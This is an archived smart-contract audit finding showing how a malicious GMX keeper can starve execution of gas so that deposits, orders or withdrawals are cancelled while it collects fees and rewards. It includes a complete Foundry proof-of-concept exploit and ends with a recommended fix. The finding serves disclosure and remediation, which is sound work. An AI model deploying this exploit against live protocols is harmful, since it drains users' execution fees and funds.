This repository was archived by the owner on Sep 24, 2023. It is now read-only.
This repository was archived by the owner on Sep 24, 2023. It is now read-only.
0xdeadbeef - Keeper can make deposits/orders/withdrawals fail and receive fee+rewards #116
Open
Description
0xdeadbeef
high
Keeper can make deposits/orders/withdrawals fail and receive fee+rewards
Summary
Malicious keeper can make execution of deposits/orders/withdrawals fail by providing limited gas to the execution.
If enough gas is sent for the cancellation to succeed but for the execution to fail the keeper is able to receive the execution fee + incentive rewards and cancel all deposits/orders/withdrawals.
Vulnerability Detail
Keepers can execute any deposits/orders/withdrawals.
All executions are attempted and if they fail, they are cancelled and the keeper is paid for the execution fee + rewards.
Example for executing deposits:
https://github.com/sherlock-audit/2023-02-gmx/blob/main/gmx-synthetics/contracts/exchange/DepositHandler.sol#L92
function executeDeposit(
bytes32 key,
OracleUtils.SetPricesParams calldata oracleParams
) external
globalNonReentrant
onlyOrderKeeper
withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)
{
uint256 startingGas = gasleft();
try this._executeDeposit(
key,
oracleParams,
msg.sender,
startingGas
) {
} catch (bytes memory reasonBytes) {
_handleDepositError(
key,
startingGas,
reasonBytes
);
}
}For the attack to succeed, the keeper needs to make this._executeDeposit revert.
Due to the 64/63 rule the attack will succeed if both of the following conditions meet:
- 63/64 of the supplied gas will cause an out of gas in the
trystatement - 1/64 of the supplied gas is enough to execute the
catchstatement.
Considering 2000000 is the max callback limit and native token transfer gas limit is large enough to support contracts the above conditions can be met.
I created a POC that exploits the vulnerability on deposits. Keep in mind that it might be easier (lower limits) for Orders as more logic is performed in the try statement and therefore more gas is supplied.
See in the Code Snippet section
Impact
- Keeper can remove all deposits/withdrawals/orders from the protocol.
- Essentially stealing all execution fees paid
- Keeper can create deposits and by leveraging the bug can cancel them when executing while receiving rewards.
- Vaults will be drained
Code Snippet
To get it running, first install foundry using the following command:
curl -L https://foundry.paradigm.xyz | bash(from https://book.getfoundry.sh/getting-started/installation#install-the-latest-release-by-using-foundryup)- If local node is not already running and contracts are not deployed, configured - execute the following:
npx hardhat node3 Perform the following set of commands from the repository root.
rm -rf foundry; foundryup; mkdir foundry; cd foundry; forge init --no-commit- Add the following to `foundry/test/KeeperCancelExecutions.t.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
interface IExchangeRouter {
function createDeposit(KeeperCancelExecution.CreateDepositParams calldata params) external returns (bytes32);
}
interface IDepositHandler {
function executeDeposit( bytes32 key, SetPricesParams calldata oracleParams) external;
}
interface IReader {
function getMarket(address dataStore, address key) external view returns (Market.Props memory);
}
interface IDataStore {
function getBytes32(bytes32 key) external view returns (bytes32);
function setUint(bytes32 key, uint256 value) external;
}
library Market {
struct Props {
address marketToken;
address indexToken;
address longToken;
address shortToken;
}
}
library Deposit {
struct Props {
Addresses addresses;
Numbers numbers;
Flags flags;
}
struct Addresses {
address account;
address receiver;
address callbackContract;
address market;
address initialLongToken;
address initialShortToken;
address[] longTokenSwapPath;
address[] shortTokenSwapPath;
}
struct Numbers {
uint256 initialLongTokenAmount;
uint256 initialShortTokenAmount;
uint256 minMarketTokens;
uint256 updatedAtBlock;
uint256 executionFee;
uint256 callbackGasLimit;
}
struct Flags {
bool shouldUnwrapNativeToken;
}
}
struct SetPricesParams {
uint256 signerInfo;
address[] tokens;
uint256[] compactedMinOracleBlockNumbers;
uint256[] compactedMaxOracleBlockNumbers;
uint256[] compactedOracleTimestamps;
uint256[] compactedDecimals;
uint256[] compactedMinPrices;
uint256[] compactedMinPricesIndexes;
uint256[] compactedMaxPrices;
uint256[] compactedMaxPricesIndexes;
bytes[] signatures;
address[] priceFeedTokens;
}
contract Keeper is Test {
fallback() external payable {
bytes32 x;
if(gasleft() > 1_000_000) {
for(uint256 i=0; i<600000;i++){
x = keccak256(abi.encode(i));
}
revert("aaa");
}
}
}
contract Callback is Test {
bytes32 x;
function afterDepositExecution(bytes32 key, Deposit.Props memory deposit) external {
for(uint256 i=0; i<5100;i++){
x = keccak256(abi.encode(i)); // 1993336 gas
}
return;
}
function afterDepositCancellation(bytes32 key, Deposit.Props memory deposit) external{
}
}
interface IRoleStore{
function grantRole(address account, bytes32 roleKey) external;
}
contract KeeperCancelExecution is Test {
struct CreateDepositParams {
address receiver;
address callbackContract;
address market;
address initialLongToken;
address initialShortToken;
address[] longTokenSwapPath;
address[] shortTokenSwapPath;
uint256 minMarketTokens;
bool shouldUnwrapNativeToken;
uint256 executionFee;
uint256 callbackGasLimit;
}
uint256 public constant COMPACTED_64_BIT_LENGTH = 64;
uint256 public constant COMPACTED_64_BITMASK = ~uint256(0) >> (256 - COMPACTED_64_BIT_LENGTH);
uint256 public constant COMPACTED_32_BIT_LENGTH = 32;
uint256 public constant COMPACTED_32_BITMASK = ~uint256(0) >> (256 - COMPACTED_32_BIT_LENGTH);
uint256 public constant COMPACTED_8_BIT_LENGTH = 8;
uint256 public constant COMPACTED_8_BITMASK = ~uint256(0) >> (256 - COMPACTED_8_BIT_LENGTH);
IExchangeRouter EXCHANGE_ROUTER = IExchangeRouter(0x4bf010f1b9beDA5450a8dD702ED602A104ff65EE);
address dataStore = 0x09635F643e140090A9A8Dcd712eD6285858ceBef;
IReader reader = IReader(0xD49a0e9A4CD5979aE36840f542D2d7f02C4817Be);
address WETH = 0x99bbA657f2BbC93c02D617f8bA121cB8Fc104Acf;
address USDC = 0x9d4454B023096f34B160D6B654540c56A1F81688;
address depositVault = 0xB0f05d25e41FbC2b52013099ED9616f1206Ae21B;
address controller = 0x1429859428C0aBc9C2C47C8Ee9FBaf82cFA0F20f;
address roleStore = 0x5FbDB2315678afecb367f032d93F642f64180aa3;
address ROLE_ADMIN = 0xe1Fd27F4390DcBE165f4D60DBF821e4B9Bb02dEd;
IDepositHandler depositHandler = IDepositHandler(0xD42912755319665397FF090fBB63B1a31aE87Cee);
address signer = 0xBcd4042DE499D14e55001CcbB24a551F3b954096;
uint256 pk = 0xf214f2b2cd398c806f84e317254e0f0b801d0643303237d97a22a48e01628897;
Callback callback = new Callback();
Keeper ORDER_KEEPER = new Keeper();
using Market for Market.Props;
function setUp() public {
}
function testCreateDepositAndCancel() external {
// Setup market
Market.Props memory market = reader.getMarket(dataStore, address(0xc50051e38C72DC671C6Ae48f1e278C1919343529));
address marketWethUsdc = market.marketToken;
address wethIndex = market.indexToken;
address wethLong = market.longToken;
address usdcShort = market.shortToken;
vm.startPrank(controller);
IDataStore(dataStore).setUint(keccak256(abi.encode("EXECUTION_GAS_FEE_MULTIPLIER_FACTOR")), 10**30);
IDataStore(dataStore).setUint(keccak256(abi.encode("NATIVE_TOKEN_TRANSFER_GAS_LIMIT")), 4000000);
vm.stopPrank();
vm.prank(ROLE_ADMIN);
IRoleStore(roleStore).grantRole(address(ORDER_KEEPER), keccak256(abi.encode("ORDER_KEEPER")));
// validate weth long usdc short index weth
assertEq(WETH, wethLong);
assertEq(WETH, wethIndex);
assertEq(USDC, usdcShort);
// initial fund deposit vault and weth
uint256 depositEth = 1000 ether;
uint256 executionFee = 100000;
address[] memory addrArray;
deal(USDC, depositVault, depositEth);
vm.deal(depositVault, depositEth);
vm.prank(depositVault);
WETH.call{value: depositEth}(abi.encodeWithSelector(bytes4(keccak256("deposit()"))));
vm.deal(WETH, depositEth);
// Create deposit params
CreateDepositParams memory deposit = CreateDepositParams(
address(this), // receiver
address(callback), // callback
marketWethUsdc, // market
wethLong, // inital longtoken
usdcShort, // inital short token
addrArray, // longtokenswappath
addrArray, // shortokenswappath
0, // minmarkettokens
true,// shouldunwrapnativetoken
executionFee, // executionfee
2000000 // callbackGasLimit
);
// Create deposit!
bytes32 depositKey = EXCHANGE_ROUTER.createDeposit(deposit);
// Maliciously execute legit deposit
vm.startPrank(address(ORDER_KEEPER));
depositHandler.executeDeposit{gas: 6_900_000}(depositKey, getPriceParams()); // get correct price commands.
// Validate exploit successful by seeing that the deposit was was paid back to account minus execution fee
(bool success, bytes memory data) = WETH.call(abi.encodeWithSelector(bytes4(keccak256("balanceOf(address)")), address(this)));
uint256 balance = abi.decode(data, (uint256));
assertEq(balance, depositEth - executionFee);
}
function getPriceParams() internal returns (SetPricesParams memory) {
address[] memory tokens = new address[](2);
tokens[0] = WETH;
tokens[1] = USDC;
// min oracle block numbers
uint256[] memory uncompactedMinOracleBlockNumbers = new uint256[](2);
uncompactedMinOracleBlockNumbers[0] = block.number;
uncompactedMinOracleBlockNumbers[1] = block.number;
// decimals 18
uint256[] memory uncompactedDecimals = new uint256[](2);
uncompactedDecimals[0] = 18;
uncompactedDecimals[1] = 18;
// max price AGE
uint256[] memory uncompactedMaxPriceAge = new uint256[](2);
uncompactedMaxPriceAge[0] = block.timestamp;
uncompactedMaxPriceAge[1] = block.timestamp;
uint256[] memory uncompactedMaxPricesIndexes = new uint256[](2);
uncompactedMaxPricesIndexes[0] = 0;
uncompactedMaxPricesIndexes[1] = 0;
uint256[] memory uncompactedMaxPrices = new uint256[](2);
uncompactedMaxPrices[0] = 1000;
uncompactedMaxPrices[1] = 1000;
// signerInfo
uint256 signerInfo = 1;
uint256[] memory compactedMinOracleBlockNumbers = getCompactedValues(uncompactedMinOracleBlockNumbers, COMPACTED_64_BIT_LENGTH, COMPACTED_64_BITMASK);
uint256[] memory compactedDecimals = getCompactedValues(uncompactedDecimals, COMPACTED_8_BIT_LENGTH, COMPACTED_8_BITMASK);
uint256[] memory compactedMaxPriceAge = getCompactedValues(uncompactedMaxPriceAge, COMPACTED_64_BIT_LENGTH, COMPACTED_64_BITMASK);
uint256[] memory compactedMaxPricesIndexes = getCompactedValues(uncompactedMaxPricesIndexes, COMPACTED_8_BIT_LENGTH, COMPACTED_8_BITMASK);
uint256[] memory compactedMaxPrices = getCompactedValues(uncompactedMaxPrices, COMPACTED_32_BIT_LENGTH, COMPACTED_32_BITMASK);
bytes[] memory sig = getSig(tokens, uncompactedDecimals, uncompactedMaxPrices);
SetPricesParams memory oracleParams = SetPricesParams(
signerInfo, // signerInfo
tokens, //tokens
compactedMinOracleBlockNumbers, // compactedMinOracleBlockNumbers
compactedMinOracleBlockNumbers, //compactedMaxOracleBlockNumbers
compactedMaxPriceAge, // compactedOracleTimestamps
compactedDecimals, // compactedDecimals
compactedMaxPrices, // compactedMinPrices
compactedMaxPricesIndexes, // compactedMinPricesIndexes
compactedMaxPrices, // compactedMaxPrices
compactedMaxPricesIndexes, // compactedMaxPricesIndexes
sig, // signatures
new address[](0) // priceFeedTokens
);
return oracleParams;
}
function getSig(address[] memory tokens, uint256[] memory decimals, uint256[] memory prices) internal returns (bytes[] memory){
signer = vm.addr(pk);
bytes[] memory ret = new bytes[](tokens.length);
for(uint256 i=0; i<tokens.length; i++){
bytes32 digest = toEthSignedMessageHash(
keccak256(abi.encode(
keccak256(abi.encode(block.chainid, "xget-oracle-v1")),
block.number,
block.number,
block.timestamp,
bytes32(0),
tokens[i],
getDataStoreValueForToken(tokens[i]),
10 ** decimals[i],
prices[i],
prices[i]
))
);
(uint8 v, bytes32 r, bytes32 s) = vm.sign(pk, digest);
ret[i] = abi.encodePacked(r,s,v);
}
return ret;
}
function getDataStoreValueForToken(address token) internal returns (bytes32) {
return IDataStore(dataStore).getBytes32(keccak256(abi.encode(keccak256(abi.encode("ORACLE_TYPE")), token)));
}
function toEthSignedMessageHash(bytes32 hash) internal pure returns (bytes32 message) {
assembly {
mstore(0x00, "\x19Ethereum Signed Message:\n32")
mstore(0x1c, hash)
message := keccak256(0x00, 0x3c)
}
}
function getCompactedValues(
uint256[] memory uncompactedValues,
uint256 compactedValueBitLength,
uint256 bitmask
) internal returns (uint256[] memory) {
uint256 compactedValuesPerSlot = 256 / compactedValueBitLength;
bool stopLoop = false;
uint256[] memory compactedValues = new uint256[](uncompactedValues.length / compactedValuesPerSlot + 1);
for(uint256 i=0; i < (uncompactedValues.length - 1) / compactedValuesPerSlot + 1; i++){
uint256 valuePerSlot;
for(uint256 j=0; j< compactedValuesPerSlot; j++){
uint256 index = i * compactedValuesPerSlot + j;
if(index >= uncompactedValues.length) {
stopLoop = true;
break;
}
uint256 value = uncompactedValues[index];
uint256 bitValue = value << (j * compactedValueBitLength);
valuePerSlot = valuePerSlot | bitValue;
}
compactedValues[i] = valuePerSlot;
if(stopLoop){
break;
}
}
return compactedValues;
}
}- execute
forge test --fork-url="http://127.0.0.1:8545" -v -m "testCreateDepositAndCancel"
Tool used
VS Code, foundry
Recommendation
Add a buffer of gas that needs to be supplied to the execute function to make sure the try statement will not revert because of out of gas.